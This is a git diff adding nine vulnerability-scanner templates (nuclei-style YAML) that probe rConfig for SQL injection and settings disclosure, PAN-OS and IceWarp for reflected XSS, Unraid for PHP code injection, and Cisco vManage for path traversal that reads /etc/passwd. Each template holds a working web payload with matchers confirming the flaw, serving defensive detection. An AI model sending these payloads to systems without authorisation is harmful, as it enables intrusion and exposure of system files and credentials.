diff --git a/cves/2020/CVE-2020-10546.yaml b/cves/2020/CVE-2020-10546.yaml
new file mode 100644
index 0000000000..c78d679292
--- /dev/null
+++ b/cves/2020/CVE-2020-10546.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-10546
+info:
+  name: rConfig 3.9.4 SQLi
+  author: madrobot
+  severity: high
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
+  tags: SQLI
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "[project-discovery]"
+        part: body
diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml
new file mode 100644
index 0000000000..b5ef60e413
--- /dev/null
+++ b/cves/2020/CVE-2020-10547.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-10547
+info:
+  name: rConfig 3.9.4 SQLi
+  author: madrobot
+  severity: high
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
+  tags: SQLI
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "[project-discovery]"
+        part: body
diff --git a/cves/2020/CVE-2020-10548.yaml b/cves/2020/CVE-2020-10548.yaml
new file mode 100644
index 0000000000..6805f02882
--- /dev/null
+++ b/cves/2020/CVE-2020-10548.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-10548
+info:
+  name: rConfig 3.9.4 SQLi
+  author: madrobot
+  severity: high
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
+  tags: SQLI
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "[project-discovery]"
+        part: body
diff --git a/cves/2020/CVE-2020-10549.yaml b/cves/2020/CVE-2020-10549.yaml
new file mode 100644
index 0000000000..8bb8758eea
--- /dev/null
+++ b/cves/2020/CVE-2020-10549.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-10549
+info:
+  name: rConfig 3.9.4 SQLi
+  author: madrobot
+  severity: high
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
+  tags: SQLI
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "[project-discovery]"
+        part: body
diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml
new file mode 100644
index 0000000000..e32111801e
--- /dev/null
+++ b/cves/2020/CVE-2020-2036.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-2036
+info:
+  name: Palo Alto Networks Reflected Cross Site Scripting
+  author: madrobot
+  severity: medium
+  reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+  tags: XSS
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
+      - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<svg/onload=alert(1)>"
+        part: body
diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml
new file mode 100644
index 0000000000..86269505f8
--- /dev/null
+++ b/cves/2020/CVE-2020-27982.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-27982
+info:
+  name: IceWarp WebMail Reflected XSS
+  author: madrobot
+  severity: medium
+  reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
+  tags: XSS
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "<img src=x onerror=alert(1)>"
+        part: body
diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml
new file mode 100644
index 0000000000..fb1a3eceb8
--- /dev/null
+++ b/cves/2020/CVE-2020-5847.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020-5847
+info:
+  name: UnRaid  Remote Code Execution
+  author: madrobot
+  severity: high
+  reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
+  tags: Directory Traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "http://www.php.net/"
+        part: body
diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml
new file mode 100644
index 0000000000..45825b279d
--- /dev/null
+++ b/cves/2020/CVE-2020-9425.yaml
@@ -0,0 +1,22 @@
+id: CVE-2020-9425
+info:
+  name: rConfig Unauthenticated Sensitive Information Disclosure
+  author: madrobot
+  severity: high
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
+  tags: Information Disclosure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/settings.php"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "defaultNodeUsername"
+          - "defaultNodePassword"
+        part: body
diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml
new file mode 100644
index 0000000000..3b06a803ef
--- /dev/null
+++ b/cves/2020/CVE-2020–26073.yaml
@@ -0,0 +1,21 @@
+id: CVE-2020–26073
+info:
+  name: Cisco SD-WAN vManage Software Directory Traversal
+  author: madrobot
+  severity: high
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
+  tags: Directory Traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        words:
+          - "root:[x*]:0:0:"
+        part: body